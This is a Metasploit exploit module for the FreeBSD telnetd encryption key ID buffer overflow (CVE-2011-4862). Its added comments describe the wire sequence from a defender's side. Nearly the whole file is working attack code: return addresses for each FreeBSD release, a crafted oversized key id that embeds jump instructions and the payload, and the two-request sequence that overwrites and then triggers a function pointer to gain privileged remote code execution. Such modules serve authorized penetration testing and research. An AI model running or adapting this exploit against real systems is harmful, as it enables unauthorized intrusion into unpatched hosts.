# -*- coding: binary -*-

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the FreeBSD telnetd ENCRYPT option buffer overflow
# (CVE-2011-4862, see 'References'). Each concrete entry in 'Targets' supplies
# one 'Ret' address that exploit_target writes into an oversized key id.
#
# Defender's view of what this module puts on the wire (the sequence a
# packet capture or IDS rule would see):
#   1. an ENCRYPT (option 0x26) IS suboption offering encryption types,
#   2. a wait for the server's ENCRYPT REPLY (suboption 0x02),
#   3. twice, an ENCRYPT ENC_KEYID (suboption 0x07) carrying a 400-byte key id,
#      far longer than any legitimate key identifier.
# An oversized ENCRYPT KEYID suboption arriving from a client is therefore a
# strong signal by itself; the durable mitigation is a patched telnetd or not
# exposing telnet at all.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Telnet
  include Msf::Exploit::BruteTargets

  # Module metadata. Target 0 ('Automatic') carries no 'Ret'; with the
  # BruteTargets mixin the framework presumably iterates the concrete targets
  # instead of calling exploit_target with that empty hash — confirm against
  # the mixin before relying on it.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',
      'Description'    => %q{
This module exploits a buffer overflow in the encryption option handler of the
FreeBSD telnet service.
      },
      'Author'         => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2011-4862'],
          ['OSVDB', '78020'],
          ['BID', '51182'],
          ['EDB', '18280']
        ],
      'Privileged'     => true,
      'Platform'       => 'bsd',
      'Payload'        =>
        {
          'Space'    => 128,
          'BadChars' => "\x00",
        },

      # One 'Ret' per FreeBSD release; the trailing comment records what the
      # address points at.
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
          [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
          [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
          [ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx
          [ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx
          [ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx
          [ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx
          [ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx
          # [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)
          [ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return
          # Versions 5.2 and below do not support encryption
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2011-12-23'))
  end

  # Runs one attempt against the connected host for a single target entry.
  #
  # t       - one entry from the 'Targets' table; only t['Ret'] is read, so an
  #           entry without 'Ret' would raise NoMethodError at the first pack.
  # Returns nil. Returns early (without disconnect) when the server does not
  #           answer the first KEYID suboption; otherwise falls through to
  #           disconnect.
  # Calls fail_with(Failure::Unknown) when no ENCRYPT REPLY ever arrives.
  def exploit_target(t)

    connect
    # Banner is rendered as hex/ASCII so control bytes cannot reach the console.
    banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
    vprint_status(banner_sanitized)

    # IAC SB ENCRYPT IS <types...> IAC SE: offers the listed encryption types.
    enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
    # IAC SB ENCRYPT ENC_KEYID: opens the suboption that carries the key id.
    enc_keyid = "\xff\xfa\x26\x07"
    # IAC SE
    end_suboption = "\xff\xf0"

    # Telnet protocol requires 0xff to be escaped with another
    # ('BadChars' forbids only 0x00, so 0xff can occur in the encoded payload
    # and this escaping may lengthen penc beyond the declared 'Space').
    penc = payload.encoded.gsub("\xff", "\xff\xff")

    # The 400-byte key id. The slice assignments below are order-dependent:
    # the 112-byte refill at offset 80 covers offsets 80..191, so the two
    # bytes written at offset 120 must come after it — as they do.
    key_id = Rex::Text.rand_text_alphanumeric(400)
    key_id[ 0, 2] = "\xeb\x76"
    key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
    key_id[76, 4] = [ t['Ret'] ].pack("V")

    # Some of these bytes can get mangled, jump over them
    key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)

    # Bounce to the real payload (avoid corruption)
    key_id[120, 2] = "\xeb\x46"

    # The actual payload
    key_id[192, penc.length] = penc

    # Create the Key ID command
    sploit = enc_keyid + key_id + end_suboption

    # Initiate encryption
    sock.put(enc_init)

    # Wait for a successful response
    # (the rescue folds any read error into "no data", so a socket failure
    # here is reported as missing encryption support rather than as an I/O
    # problem)
    loop do
      data = sock.get_once(-1, 5) rescue nil
      if not data
        fail_with(Failure::Unknown, "This system does not support encryption")
      end
      # IAC SB ENCRYPT REPLY <type 0x01>: the server accepted the offer.
      break if data.index("\xff\xfa\x26\x02\x01")
    end

    # The first request smashes the pointer
    print_status("Sending first payload")
    sock.put(sploit)

    # Make sure the server replied to the first request
    data = sock.get_once(-1, 5)
    unless data
      print_status("Server did not respond to first payload")
      # NOTE(review): returns without disconnect; presumably the framework
      # closes the socket during module cleanup — confirm.
      return
    end

    # Some delay between each request seems necessary in some cases
    # (IO.select with no descriptors is used as a 0.5 s sleep)
    ::IO.select(nil, nil, nil, 0.5)

    # The second request results in the pointer being called
    print_status("Sending second payload...")
    sock.put(sploit)

    # Framework payload handler; started only after both requests are sent.
    handler

    ::IO.select(nil, nil, nil, 0.5)
    disconnect
  end
end